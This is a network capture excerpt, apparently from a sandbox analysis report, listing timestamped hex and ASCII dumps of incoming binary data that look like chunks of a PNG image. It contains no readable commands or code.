                                                                                                                  2023-08-29 17:16:42 UTC780INData Raw: ff c4 9b dc 67 08 7b d1 45 a1 d7 72 40 5e f1 8f 1b 14 49 e5 ad 49 d6 d1 4d 08 31 8a 14 4f 60 a4 e5 41 90 e6 cd ef 11 39 67 91 f9 d1 7c 14 09 30 79 41 4e d2 30 a9 29 a5 55 70 44 dc 30 69 0b e3 85 a0 a5 f0 46 72 ea d0 31 4e 92 ad 49 72 e2 a7 0d 59 f1 ff e3 5e f0 41 c4 41 06 f9 a5 48 22 ad a5 5e 05 b3 5c 3f 34 d0 ce 71 92 95 55 09 49 86 5c 8a 00 43 b8 8b 00 31 5d 04 f1 22 17 74 38 57 00 00 20 00 49 44 41 54 47 13 99 d1 7d 6b 6c b7 ad a1 18 f0 44 c0 21 3b 1b c2 19 87 84 4a 1c 59 00 b5 f1 b7 23 4c fb e6 cd 3c 05 53 44 42 03 38 fe 8d 1f d8 75 a1 a8 f0 44 c2 54 2c cc c9 11 3b 61 72 da ad 66 6b 1c 30 5b 3c 01 38 dc a9 1b d3 61 4b 05 28 ad e4 b8 d7 61 a9 27 d3 7f 29 3d 98 7f 45 f1 30 46 64 e8 f7 2d 9d 1d c4 f5 31 f1 08 b9 f4 5b 12 41 f8 d3 d4 4d 14 da 83 e4 cd 15
                                                                                                                  Data Ascii: g{Er@^IIM1O`A9g|0yAN0)UpD0iFr1NIrY^AAH"^\?4qUI\C1]"t8W IDATG}klD!;JY#L<SDB8uDT,;arfk0[<8aK(a')=E0Fd-1[AM
                                                                                                                  2023-08-29 17:16:42 UTC784INData Raw: 45 c2 5c 18 2e 89 13 90 4a fe d0 5d 01 41 99 d8 8d 4d f0 0b 44 4b 7c 38 45 a0 cb db c5 49 3b d4 59 60 1d 38 4a c4 a0 71 67 4d f1 2f ac f9 eb d3 ad b0 1a c8 ad a0 82 90 44 18 15 28 0c 3d 19 95 c6 b1 71 a4 72 ca e1 d0 29 3d 0c 53 bd 3e 16 55 0b c9 b9 d1 64 01 e9 c8 ac 3d cb d5 7a 29 75 a5 4b 4a e7 e1 44 b9 49 39 67 29 aa d9 55 a0 4e 53 45 69 f0 d2 0b 8b 1d d7 23 74 2f d0 30 49 0f b6 c6 36 1b e4 30 46 81 53 82 4d 18 d3 a5 47 f0 ff 04 4d 0d ed 76 fd 18 e2 f6 48 7c 3c ba e3 66 90 ce 5a ab d1 21 09 4f d9 d7 49 b3 b9 d5 49 e6 32 cb 26 89 d0 b0 db 19 8a 30 d9 19 3b d7 49 d8 40 a4 8f 89 07 60 8b 89 10 85 44 a1 81 8d d9 fe 23 a5 b6 e6 89 ac f3 cb 40 45 47 c9 40 ef e1 cb a5 58 96 89 c0 35 52 58 e0 45 e1 11 fb 83 9d 89 11 95 d9 81 02 d5 25 54 08 9a d9 ca 40 bd 96 89
                                                                                                                  Data Ascii: E\.J]AMDK|8EI;Y`8JqgM/D(=qr)=S>Ud=z)uKJDI9g)UNSEi#t/0I60FSMGMvH|<fZ!OII2&0;I@`D#@EG@X5RXE%T@
                                                                                                                  2023-08-29 17:16:42 UTC788INData Raw: 45 49 46 8e 76 84 42 38 c5 cb 9f 2f ba c8 dc 58 45 75 19 19 86 d9 db d6 51 31 f2 91 45 45 12 d7 51 31 71 d0 49 6d 49 d8 51 31 34 d0 43 89 19 d6 f7 49 10 c4 3d c2 5d f4 41 1f 19 e3 b3 72 df a5 58 a1 3d c0 6a b6 e6 86 44 49 de d0 53 49 19 d0 45 a1 21 a6 ba b6 19 53 81 5d 9a 18 ba 17 da d0 ce 09 09 8e 86 1f 92 a4 45 6d 11 86 ad 81 e6 2f ba 49 49 38 b1 9b 19 d0 c0 89 99 89 1c 3d 6c 38 b3 86 19 f8 45 89 39 eb c4 62 d9 14 00 00 20 00 49 44 41 54 b5 3c 1d e3 85 19 f2 df ad af 1b df 05 49 16 89 45 7a d9 90 23 be 5f dc 49 49 18 a5 0b 1a 4e 5d 79 cc 19 3c 06 55 61 53 7a 49 a2 d0 45 59 19 d0 30 69 4a 38 55 e8 2b 2f ba 49 5c 59 42 3c 19 c3 c8 0f 0d ba 47 c0 5f d0 4d c0 1f 88 cc 0f 01 59 45 0f 1d 3b 48 c2 26 59 3b 49 11 59 7b c0 47 c8 cc 17 59 d4 c4 07 15 d2 54 49 fd
                                                                                                                  Data Ascii: EIFvB8/XEuQ1EEQ1qImIQ14CI=]ArX=jDISIE!S]Em/II8=l8E9b IDAT<IEz#_IIN]y<UaSzIEY0iJ8U+/I\YB<G_MYE;H&Y;IY{GYTI
                                                                                                                  2023-08-29 17:16:42 UTC792INData Raw: b2 a2 59 e0 e1 3c c9 d0 2d c4 2d 33 22 ac 39 d2 46 a9 7e 11 22 4f 40 89 76 bf f2 d4 40 f1 18 5c b3 09 3d af 4a 25 9c a5 e5 4c d8 d6 85 c8 1d 96 4f fb 32 72 44 0c 13 74 0b 43 8b 86 4f c9 16 d4 c0 6b b9 d5 7e 97 16 54 5f 48 f9 d0 cf 5a 9d 02 cc 3c d5 d0 cc 3c c1 59 30 f1 90 a5 45 e9 91 85 a2 46 9d 3d 42 41 19 d0 06 e9 28 95 89 c0 44 c0 f1 46 95 1d 85 48 93 1a c5 49 f0 f0 c5 b0 41 a7 48 46 19 6e 87 46 af 50 c5 28 00 d0 3d ca f9 df ce 04 a1 bb c5 89 10 df f3 cd 11 70 45 4b 19 ba 4d 88 f1 d4 1b 72 df 90 cc 0c a1 df c1 c9 b9 d6 2f c9 1e 89 7e 88 16 57 1a 09 18 d0 ba 6d 9c 09 75 5d 61 e3 55 89 9a 9d a5 c9 4a 5c cc 0c 11 48 cc 0c 19 b8 81 c0 5c 38 25 c0 5c 6c ac 72 79 d4 05 42 9a d0 ad 69 6d ec c6 a1 1a a4 45 62 32 16 31 57 51 98 31 6b 08 50 44 46 9c cd e5 4a 10
                                                                                                                  Data Ascii: Y<--3"9F~"O@v@\=J%LO2rDtCOk~T_HZ<<Y0EF=BA(DFHIAHFnFP(=pEKMr/~Wmu]aUJ\H\8%\lryBimEb21WQ1kPDFJ
                                                                                                                  2023-08-29 17:16:42 UTC796INData Raw: a5 48 f0 75 a5 6b 39 df 44 68 de 95 47 55 39 ea 45 a2 38 53 ad 3a 89 df c1 43 e5 b2 7e cd 7e 40 07 a4 7b a4 06 b9 0f f0 47 6e 39 d2 c2 6d f9 89 46 c9 3d 01 01 c3 5c cc 41 18 df d0 00 01 29 58 00 00 de 95 27 71 f9 c4 45 a0 2b 61 46 cb 16 bf ce d9 19 d7 61 39 3e ed 4e 8e 18 d0 65 0e 09 a8 45 4a ce cc 41 a0 51 f0 4f 2f 39 79 45 59 6d 85 b4 56 9d d0 70 df 1d f5 df 4d 3f 4a 41 19 06 d0 ac eb 56 4a 41 4c f0 2e 64 6c 95 c3 6c 40 f8 f3 ac 47 b9 d5 e0 0b 97 36 00 00 20 00 49 44 41 54 ed 69 6d a1 15 e1 59 a4 7f e8 04 c0 a0 09 a6 3d 35 05 92 d2 d1 c8 1f 6c d5 58 71 ec 55 d9 b8 c6 04 f6 19 3b 23 c7 5d 84 26 4a 8b 55 2c 4a 6d b8 02 0d f2 e3 45 4e b3 e2 78 0a 07 83 46 06 43 d3 77 bf 5b 78 dc a2 7a cd 46 19 0a d3 58 50 1a 14 30 7b 50 82 5c a0 52 d1 5b 7c 09 f0 16 18 f1
                                                                                                                  Data Ascii: Huk9DhGU9E8S:C~~@{Gn9mF=\A)X'qE+aFa9>NeEJAQO/9yEYmVpM?JAVJAL.dll@G6 IDATimY=5lXqU;#]&JU,JmENxFCw[xzFXP0{P\R[|
                                                                                                                  2023-08-29 17:16:42 UTC800INData Raw: aa 68 12 df c7 1f b2 50 1c f2 1c a4 25 49 65 e0 45 cd 29 d0 ef c5 29 d0 d1 79 19 4c 75 49 bd e0 45 eb ae 41 48 0d 97 cc f5 5f 05 a0 45 e3 01 a0 45 51 69 d0 51 39 19 c4 35 49 b3 c0 35 49 09 a0 45 45 69 d0 49 39 19 7a 4d 39 19 d8 35 49 1d a0 45 4d a2 c9 10 7a 0b 00 15 49 c1 e0 45 a1 29 d0 b9 ba 08 d1 b0 51 5f d3 15 42 a1 c8 b7 49 62 c8 3a 70 18 6a 5e b6 2f 2f 73 b6 2f 2f 73 ba 2f 6d 23 69 e6 e6 b0 7f 8d 84 ba 7f eb e6 ed 13 4a 62 58 ed e8 d1 35 49 31 a1 45 f1 2c e0 44 ad 29 d0 4d 89 19 2f 73 c1 59 68 45 0e 1b 53 83 4a 9a 17 46 49 9a 29 4d 3b d5 23 e0 b6 19 f4 d0 dd 4d c4 3d c4 50 d0 45 6a c8 5a 43 c1 1e 5a 45 0f 18 11 ac 4b 91 97 44 09 9a 16 47 ca de d2 44 dd bf f5 43 dd 89 d3 c9 ca df d1 03 ca de 7a 44 48 23 58 4c cf 92 d0 49 31 19 d6 ef 39 19 d6 2d 49 1f
                                                                                                                  Data Ascii: hP%IeE))yLuIEAH_EEQiQ95I5IEEiI9zM95IEMzIE)Q_BIb:pj^//s//s/m#iJbX5I1E,D)M/sYhESJFI)M;#M=PEjZCZEKDGDCzDH#XLI19-I
                                                                                                                  2023-08-29 17:16:42 UTC804INData Raw: 6e 8b 90 95 45 b1 2a 10 ce 34 e1 5b 08 41 ed 23 ef f9 18 3b 6b be c6 64 c6 8e 99 d5 b5 28 18 c0 4e b9 78 d1 47 b9 c8 9d 10 59 1a 18 6e 99 59 82 2f 49 48 38 3b fb 1d dc ce f8 1d 38 4d 41 f9 d8 cc 3c e1 b0 15 0c 8b d3 55 f9 17 3b 43 c4 68 ec 45 19 7f df 2a 4f 29 d0 0b 19 17 bf 45 1f 39 cb fe 49 7f df 2a 17 29 b6 4a 36 8b d7 45 79 56 c0 45 09 4e f0 45 69 3b 8f 45 d9 76 b6 05 49 39 be 15 00 19 c0 33 29 19 c0 3b 39 19 b0 22 00 19 9c 3a 26 19 9c 3a 3e 19 9c 3a 49 66 a0 c8 ff 99 d0 76 36 f2 99 00 00 20 00 49 44 41 54 45 49 1d 5d fa 48 13 99 30 ea 92 a5 45 b1 92 ad b9 c2 fc 8d 86 49 4c 5b a9 ca f5 cc cc 34 19 24 cc 3c e1 59 18 b5 92 d0 18 45 92 13 dc c2 d1 5b 45 0c 11 e3 8f 62 d3 53 a4 4b 16 d1 49 d0 92 28 76 b3 32 c0 bf ca fe df 44 4f 92 01 4e 49 ce a5 0f c2 6c
                                                                                                                  Data Ascii: nE*4[A#;kd(NxGYnY/IH8;8MA<U;ChE*O)E9I*)J6EyVENEi;EvI93);9":&:>:Ifv6 IDATEI]H0EIL[4$<YE[EbSKI(v2DONIl
                                                                                                                  2023-08-29 17:16:42 UTC808INData Raw: 16 5d f2 fe a3 4b 93 38 47 04 f2 c6 70 af 1b a2 ad 4b 50 50 24 49 92 2f 30 d9 05 5b 8b 1a d8 61 96 be 38 78 4d 59 9c 10 25 cc 64 24 ac 34 5a b0 40 e9 b0 05 b9 b6 e6 53 ce c2 15 95 4d a9 1d f0 cf c4 54 30 cc 0d 44 28 a5 22 f1 a4 a3 49 6e 95 44 69 6a a5 6e a1 be 69 bb b6 3f 83 44 49 1d 62 fe 49 1b 62 7d 14 19 3c 31 4e 92 95 ad ca 79 c4 35 b4 d9 d9 18 29 16 87 ce 34 b1 dc 7e b2 59 d6 31 05 1f 58 17 4f 1f f9 05 4f 59 49 55 72 ea 58 5d 61 16 54 b1 cb 2f c8 05 47 10 5b 65 0c f9 5b c5 9d f9 d1 7e b2 19 59 00 bd 90 ad b9 46 9f d2 da c8 3e d6 7f 8a 6d a9 79 51 3c a4 04 49 0c f0 68 18 49 38 41 f9 25 94 68 57 2a 19 04 70 09 9d b9 3f 0f 30 85 71 01 a4 45 39 93 de ce 1c 11 58 4f 49 e6 95 4d b6 54 2c ce b9 99 5a 43 c2 54 d8 cd 48 d9 d1 47 0f f9 d1 ae 66 92 85 51 72 19
                                                                                                                  Data Ascii: ]K8GpKPP$I/0[a8xMY%d$4Z@SMT0D("InDijni?DIbIb}<1Ny5)4~Y1XOOYIUrX]aT/G[e[~YF>myQ<IhI8A%hW*p?0qE9XOIMT,ZCTHGfQr
                                                                                                                  2023-08-29 17:16:42 UTC812INData Raw: 47 6d f2 e0 ca 48 f1 b6 75 6c f2 c7 54 c6 18 38 24 b1 6e bb 14 c2 4c d0 49 46 ae 92 43 1a 92 18 41 1f 4e 40 0e 6c 19 50 45 49 13 6f 27 08 d6 c0 11 c2 5b d4 ce e9 0b df f2 90 a7 b1 1e 6c c8 9a 45 cc c2 59 30 b5 6d c3 7e c9 c6 a4 4d c8 d8 d0 79 79 4e 80 6d f6 e6 af 25 49 3d 90 22 8a 59 a5 57 72 ca a5 4b 19 05 b6 45 c2 54 dc cc 11 1d 59 5d 69 f2 9c c4 88 18 b0 47 c0 44 d0 b9 46 ae 29 ce 83 d8 39 45 5c d8 30 4e 42 d1 db 08 08 d8 ce 84 ab 12 55 8b b9 85 59 45 59 6c cf ce 41 92 80 41 49 92 09 46 9b d8 3b 5a 42 99 03 ac 38 12 53 00 00 20 00 49 44 41 54 46 80 98 17 ba b6 59 b5 45 9f 90 80 41 c0 11 a4 a4 48 19 d5 4e 86 46 8e 23 c0 51 d6 4d 8c 29 5a 66 5d 4a 5b 18 59 39 86 cc 0c c9 87 e4 e8 94 95 d5 b9 49 38 59 19 3f 89 1c b9 30 d2 15 09 5f c1 c6 a5 15 5d 30 49 e9
                                                                                                                  Data Ascii: GmHulT8$nLIFCAN@lPEIo'[lEY0m~MyyNm%I="YWrKETY]iGDF)9E\0NBUYEYlAAIF;ZB8S IDATFYEAHNF#QM)Zf]J[Y9I8Y?0_]0I
                                                                                                                  2023-08-29 17:16:42 UTC816INData Raw: 43 3b 19 12 75 89 90 10 18 09 42 70 22 d9 29 1a 55 d9 29 87 73 66 2a 02 1a 66 46 ff e4 17 36 1b ce 88 a6 82 6a 8e cb e4 30 4a 71 f0 c6 6d 0a 55 61 39 37 02 6a 9f c4 06 6a 84 59 dd 75 78 c6 ff 55 ea 1c 00 d1 43 6d d0 50 05 19 e0 83 be c9 f3 c5 8b 3a 1e 4e 88 22 12 b5 5f 09 cc 4a cd b3 41 e0 91 f1 03 b3 b1 36 e0 c5 45 09 5f 49 c6 15 5f 49 c8 15 04 66 8e 37 e0 82 69 29 05 77 5c 0a f4 4a 9c 12 f7 75 56 15 c6 49 8b 90 84 61 03 05 36 16 cf 89 d3 c4 af 78 ff ce bb e7 56 6a 7a ef 7f 6a e6 36 7f 6a e6 36 8f ea 66 b6 ff ea 66 b6 ff e9 66 3d 78 6a 8f ad 39 ee e8 36 38 45 e3 ba ff 31 f9 0b 2f ea 66 b6 ff ea 66 b6 ff ea 66 b6 ff ea 66 b6 ff 40 e1 36 12 b5 6a 05 5b 95 7a c8 80 4e 88 ee 12 c5 5e 19 b2 25 49 c9 50 1a 17 44 f0 75 59 3d e0 c5 6f e5 f4 12 a9 d7 10 dc 76 3d
                                                                                                                  Data Ascii: C;uBp")U)sf*fF6j0JqmUa97jjYuxUCmP:N"_JA6E_I_If7i)w\JuVIa6xVjzj6j6fff=xj968E1/ffff@6j[zN^%IPDuY=ov=
                                                                                                                  2023-08-29 17:16:42 UTC820INData Raw: 6b 49 18 d5 25 4c 19 d0 4a 59 6c f1 13 a1 4b fe 46 4e 6c c6 a0 4c 1f 31 40 3c 01 d7 02 0e db db a5 3d 2a 02 b2 49 6c c4 cc 1c e1 5b 9d 1f 1d 38 45 08 31 28 ba 10 6c f7 4c 09 09 91 37 48 08 8a 33 40 94 d0 03 d6 7f ed 5c 49 6e e1 44 4d 18 df f2 8f 6e d3 c6 a1 19 f0 c6 89 d0 eb 00 5d 6a d2 5f c9 0f d8 7c 14 e5 a2 6c c9 6c d5 7e 0c e1 a6 67 a9 18 50 41 ca 64 c0 45 3c 3d 50 f0 09 56 9f ed 41 6c f2 84 48 6d d2 46 09 33 53 20 b5 19 3b 1b c8 d9 6c 4a e6 54 c4 46 81 b9 6f 04 ab 09 3b c6 e1 1d 6e 45 3f 66 d0 30 52 b1 d1 30 77 9a 30 75 4b 6d d9 c4 89 63 50 b5 ef b8 ed 00 00 20 00 49 44 41 54 3e 3e 10 d1 85 6a 35 e9 30 b5 6f f7 ad 49 5f a8 bb b6 ef 95 5d 48 31 17 45 6b 59 d3 31 89 3c 2c ba 49 f2 c0 cf 0c 01 f4 47 bf 33 08 64 02 1a d0 87 b5 99 e7 c0 89 1f 8e 44 7e 79
                                                                                                                  Data Ascii: kI%LJYlKFNlL1@<=*Il[8E1(lL7H3@\InDMn]j_|ll~gPAdE<=PVAlHmF3S ;lJTFo;nE?f0R0w0uKmcP IDAT>>j50oI_]H1EkY1<,IG3dD~y
                                                                                                                  2023-08-29 17:16:42 UTC824INData Raw: 75 81 16 56 13 f9 1c 30 47 0c b1 e0 16 19 f1 e5 25 4b 99 84 c6 b1 19 2f 4a cd a6 d3 45 49 5a d0 ba 0c b5 3b 5d 23 18 83 14 a9 18 80 ad 5e c1 d1 e4 99 18 e3 c5 89 49 80 2f 4c 94 5d c4 4f bb 81 55 13 54 78 14 a9 77 54 04 4a 11 2f 50 61 68 dd b5 cc ef df 41 cd 6f 70 47 23 19 5d 00 ed 1d 80 13 0d 10 5b 00 d9 92 d0 e4 99 08 2f 50 55 59 73 54 00 29 d2 45 c2 5c 7c ce 04 81 d3 84 49 20 a5 e1 c0 5c 70 4a c5 1b ee 75 48 9a ad cd 49 16 54 1b d6 b9 ca 56 4d 49 d6 6d 4d df 62 45 44 1c 4a 41 b6 59 c6 c6 34 bd d1 4a 4d 95 2e d5 49 e6 95 dd b6 5c f0 e5 a2 78 ec 44 09 8b d2 30 49 01 df f2 7a 2a 19 23 ca 1b 2e 75 5d d8 93 06 ca 5c 7c 48 19 3a 78 05 53 ed d1 7c b6 6c 78 41 a1 7b b0 5b 2f 22 95 ed 10 31 df c0 fb 3b d4 e5 18 11 a4 58 49 73 dd 1d 19 90 95 ed a1 43 92 b2 48 8b
                                                                                                                  Data Ascii: uV0G%K/JEIZ;]#^I/L]OUTxwTJ/PahAopG#][/PUYsT)E\|I \pJuHITVMImMbEDJAY4JM.I\xD0Iz*#.u]\|H:xS|lxA{[/"1;XIsCH
                                                                                                                  2023-08-29 17:16:42 UTC828INData Raw: a5 49 2e cc 3d cc ef 87 30 52 11 e9 70 a1 19 d5 31 18 f1 4e c5 4e 19 d0 c0 89 6c 98 c0 44 19 a4 7b c2 45 f4 55 cc c2 d0 31 7f 4a 38 02 06 e6 2f 45 10 92 28 ae 6c 49 38 79 48 19 d5 7e 8e 40 a6 52 c2 1f d0 c5 75 21 ed 30 46 4e 83 d5 19 f1 87 64 49 90 14 49 49 62 90 4a ca df d4 ce 4f 99 f3 90 4d 2a 10 45 12 da 5b 43 c4 5d d0 7d 48 f2 24 2f 59 71 b8 45 1b 02 a8 ad 88 8f 2e ba 49 2a 10 76 bf 20 a5 4d 46 19 45 85 72 df a5 59 a1 7f 90 08 b7 e6 17 45 5f 9d ba 13 59 f1 aa d1 b7 19 fd 51 7a d9 d0 ae 77 a6 2f 3a 49 19 87 44 09 23 38 81 42 19 d0 1c 10 19 eb 82 52 d9 27 9d 3d d5 f0 2f 4e f1 78 e2 54 ec c2 00 00 20 00 49 44 41 54 6b 89 49 59 30 5b e5 d1 42 62 e6 50 62 c0 5c 34 cd 8e 5c 2c 45 0a e6 38 4c 89 0b 70 ce 0c fd 38 dc 49 02 13 85 43 1d 74 68 89 13 13 2f 45 71
                                                                                                                  Data Ascii: I.=0Rp1NNlD{EU1J8/E(lI8yH~@Ru!0FNdIIIbJOM*E[C]}H$/YqE.I*v MFErYE_YQzw/:ID#8BR'=/NxT IDATkIY0[BbPb\4\,E8Lp8ICth/Eq
                                                                                                                  2023-08-29 17:16:42 UTC832INData Raw: 8d c9 f0 e1 c5 b0 11 a7 47 4f 69 ea 0f a2 c4 5b 08 6d 39 5b 4c c2 90 6c c4 45 10 ea 45 48 6c d5 2f 4c 40 3b 82 49 16 6e 85 ca f1 fb 31 54 19 98 0d 3d 14 53 ad 4a 16 d4 c0 c2 89 de ce 87 f2 7e 2f 69 1b 89 82 0c 95 01 52 a2 bb 40 c6 2c 95 d0 b5 49 f2 49 70 4c 39 59 30 e1 6f 79 48 4c 1d ba 45 4d f2 7d 79 62 6d f8 79 49 34 a4 61 73 da a4 fc 75 09 93 4a c7 25 30 41 75 5c ae 05 59 25 b3 4a c7 29 61 45 2c 11 df ca 61 69 d0 2f 4f f2 51 25 03 73 db ac 30 e9 cb 10 4c 16 5c c3 1b c9 d0 29 4c 16 54 11 09 18 f0 7f 8a 16 54 23 88 18 85 e9 45 f0 c4 a5 4a 19 d8 ae 53 25 e9 45 36 03 53 38 fd 00 a3 4f c9 e6 95 f1 63 da 58 42 39 02 d8 ba 0c a9 60 55 73 da ad a7 64 67 d4 18 b9 1a 30 4c c0 f9 d9 c0 a0 17 b0 85 49 a9 d3 c4 4d 90 a5 e1 3c 39 f6 ae 4f e6 9d d6 4a 6d 26 91 a2 01
                                                                                                                  Data Ascii: GOi[m9[LlEEHl/L@;In1T=SJ~/iR@,IIpL9Y0oyHLEM}ybmyI4asuJ%0Au\Y%J)aE,ai/OQ%s0L\)LTT#EJS%E6S8OcXB9`Usdg0LIM<9OJm&
                                                                                                                  2023-08-29 17:16:42 UTC836INData Raw: 7d 14 83 30 14 08 c5 52 0a f9 0e 5b 83 9b 0e dc 9e 31 c8 c7 44 d5 c4 94 61 41 90 d2 51 23 e6 30 45 69 f1 1a e7 6c 1b c4 01 5d 5d f4 55 8a 9a ac 45 6d 11 d0 31 4f df d1 68 49 58 27 9d 1f 92 21 76 9b 1b 27 c5 0c 9a 2a 4c 3f 1c 50 45 8b 4e 3b 46 c9 db e0 cd 49 08 91 c0 89 6e 36 83 48 19 d0 0c c3 0f 5a 44 c1 08 d0 0c c1 1f 96 7e b8 6b 22 55 17 db d8 45 78 01 ad 55 43 18 60 e8 3c 13 55 85 34 1f ba 25 48 73 da ae 4c db 85 95 6b f1 ee d8 19 02 60 a4 fb 03 e0 04 d9 1b a5 43 89 20 95 4d 34 18 90 95 48 c9 c5 74 c9 fa d8 ad 31 5c d2 c5 0b 11 5b 8d 0d 3d d4 66 fc f1 b0 34 48 09 dc cc 88 1a 81 14 49 21 d8 13 7a 39 7c 46 89 0d 00 85 c7 e5 c2 00 00 20 00 49 44 41 54 47 1e 6d da 83 4f 34 d0 03 be c2 c3 84 be c1 5b 49 b7 90 c0 95 38 2f c0 15 1a f1 d2 1f 29 27 53 bc 40 90
                                                                                                                  Data Ascii: }0R[1DaAQ#0Eil]]UEm1OhIX'!v'*L?PEN;FIn6HZD~k"UExUC`<U4%HsLk`C M4Ht1\[=f4HI!z9|F IDATGmO4[I8/)'S@
                                                                                                                  2023-08-29 17:16:42 UTC840INData Raw: ad b4 12 2e ba 72 29 23 82 49 33 10 57 89 5f de ba 65 f1 3b 05 4d 59 c5 ce 48 4a 9d b1 79 9a b1 35 b4 1a 5c 05 61 b8 30 45 50 05 a8 76 8c 90 95 b9 c8 d8 13 08 b9 e6 83 cc 0c 18 42 47 1f 99 fb 86 1e 92 ad 5d 3c 19 fb 7c 14 09 a4 5e a1 be f1 85 59 73 c6 1b 1a 18 d0 cc 79 91 38 f9 1b 1a 83 83 a2 33 d2 7c 89 5c 24 2f 4c f2 d7 c4 4b 99 9d 05 19 94 a5 b5 a1 e3 51 2b 04 1b 3c 05 60 22 1b 31 4c 92 85 45 b9 90 c1 ce 04 e5 8f 1b c9 2a 1d 1e a1 66 b2 bb 49 77 c7 44 29 b9 d5 26 29 11 f0 59 be c1 cb 75 89 9a 30 40 a9 29 b0 0b b5 49 7c ad 10 3b a9 65 15 0d 14 50 7d d0 c5 65 45 92 9d 51 1f d9 83 12 7a 19 2f 7e 8e 90 a5 a5 c0 5c c0 ad c0 54 0c 65 16 e5 da bb a5 e6 87 44 49 3d 8f 55 2a 0c f1 1a 48 8b d1 65 16 4e 5d 08 85 90 ad a9 09 90 ad b5 a1 89 e7 e5 6c ee d0 30 32 92
                                                                                                                  Data Ascii: .r)#I3W_e;MYHJy5\a0EPvBG]<|^Ysy83|\$/LKQ+<`"1LE*fIwD)&)Yu0@)I|;eP}eEQz/~\TeDI=U*HeN]l02
                                                                                                                  2023-08-29 17:16:42 UTC844INData Raw: 41 69 ed 70 4f b1 1a 89 31 40 f5 38 c1 99 9a 20 59 18 b9 d5 d4 76 49 ef 05 3f 5c e9 18 d5 6d 80 02 d5 bd 38 d1 19 66 89 2f 18 17 ba 35 24 19 b8 f9 4e 19 d0 82 0c b9 d2 55 c8 20 8d f9 c0 44 10 cd 69 44 1c ad 82 3c d0 02 3c 91 f0 c6 8d 05 59 02 69 19 c8 cc 79 5e f0 ac 03 a9 d7 05 4d 16 54 67 40 ab 99 d9 a1 52 51 41 a0 e2 d1 c5 5f 20 8d f1 3c 13 e9 18 49 a1 a5 40 c0 46 cc ae 1e 99 5d 00 cd 49 5d 00 fd f9 b4 a7 ed 8b 72 4a cd 5b a1 4e a9 9a 41 44 61 e6 c5 e5 1d 18 fc 15 48 16 67 e5 0c 81 ba ba 19 79 d0 d3 08 19 fa d1 08 19 42 04 49 97 91 45 c5 49 5c ad 09 b9 d8 36 41 20 8d e9 18 1f d0 f5 3c 1c 5b 02 55 f2 84 f0 1a 1f 7c 1d 4f c5 94 cf 12 1f 16 15 48 0a 8f 4a 87 3d 9d 00 00 20 00 49 44 41 54 43 15 1f 0a 61 1b 1f e9 18 ed b2 00 4b 18 1f 78 16 4f 55 83 43 ed 4f
                                                                                                                  Data Ascii: AipO1@8 YvI?\m8f/5$NU DiD<<Yiy^MTg@RQA_ <I@F]I]rJ[NADaHgyBIEI\6A <[U|OHJ= IDATCaKxOUCO
                                                                                                                  2023-08-29 17:16:42 UTC848INData Raw: 3f 76 24 80 44 2d 26 ed fc f6 29 14 4e 7d 24 e1 4c 28 24 c3 24 74 9d de ce b9 19 97 65 c2 5e b0 4f d7 3d c5 42 b0 24 b0 74 56 1e 54 b7 b6 24 95 5a 4e 4b c5 42 69 90 87 c5 0d bd 05 54 4e b1 c4 42 79 0b d7 71 5c 1e 69 7b 7f 8f 6f 7b 19 18 50 5a 4e 06 d7 a5 43 78 c4 42 79 90 87 71 7f 20 f2 7a 65 ff 25 6a 76 38 ef 37 27 36 ef 6a 76 32 ef 89 69 cc ff 7a 6f 26 d2 69 31 6e ef 70 9a 26 e5 79 7c a9 04 77 7c 8f b0 45 70 2c 44 ef 52 2a e5 80 72 2c 85 9b 7f 2c c6 21 59 1a e3 70 24 38 d4 75 a0 83 43 7a 7c 2c e5 5b 2b 20 e5 e1 93 26 e5 34 76 2c 4c ad a1 99 e2 7a 7c 2a e5 dc db ee ea 70 11 c3 e6 70 4d e2 ef 70 d4 2f e5 8a 09 65 ef 70 75 2c d9 4c 70 2c db 94 6d b8 78 0a fb 35 9f 69 a0 71 bd 78 7c 63 91 40 77 2c f0 34 3b 26 e5 c1 7f 44 cf 6b 19 18 97 7a 7c e6 f6 35 41 6e
                                                                                                                  Data Ascii: ?v$D-&)N}$L($$te^O=B$tVT$ZNKBiTNByq\i{o{PZNCxByq ze%jv87'6jv2izo&i1np&y|w|Ep,DR*r,,!Yp$8uCz|,[+ &4v,Lz|*ppMp/epu,Lp,mx5iqx|c@w,4;&Dkz|5An
                                                                                                                  2023-08-29 17:16:42 UTC852INData Raw: 85 50 d9 f0 ba 0c e5 91 53 8e 58 91 53 3b be 8b 1a 17 5a 87 a9 49 35 5b 08 45 4a 5b 18 51 09 5b 06 4d 24 11 70 1f 4e 16 45 0c e6 d0 3a 4f 16 6e 0c 49 11 3b 46 c2 50 d8 c6 b0 19 2f cc 04 e1 ac 41 72 d1 f0 39 4c f1 4e 85 88 34 d8 fa c8 18 aa 7c 77 16 55 8e 4b d8 4e cd 59 1a 6b 04 33 16 55 6c 49 45 b1 85 34 22 13 31 5b 1a ad 80 e1 09 f3 45 4f 18 ae 4a cc 1f 90 47 a1 82 1a e2 81 b0 16 85 59 f1 59 05 4d da 79 0f c0 99 fd 3e 08 1a 50 c9 09 1a ba 45 48 4f 59 00 59 f1 f6 b7 09 e6 2f c0 89 40 89 c5 07 02 71 c5 69 20 ee 30 6f 5b 49 65 0a 02 d5 ce d1 12 52 dd 4c f1 21 fa b4 b1 2f ad 79 9b ca d1 ca 03 59 44 27 7f ce 44 5e 5b d4 ad 5a 99 d2 c5 00 2a d8 b3 c0 a9 12 46 10 ee 2f ba 49 9d 10 1c 3c 45 e3 0a 19 e3 05 00 00 20 00 49 44 41 54 9e 70 11 cf 3b 54 d9 40 ce 05 1a
                                                                                                                  Data Ascii: PSXS;ZI5[EJ[Q[M$pNE:OnI;FP/Ar9LN4|wUKNYk3UlIE4"1[EOJGYYMy>PEHOYY/@qi 0o[IeRL!/yYD'D^[Z*F/I<E IDATp;T@
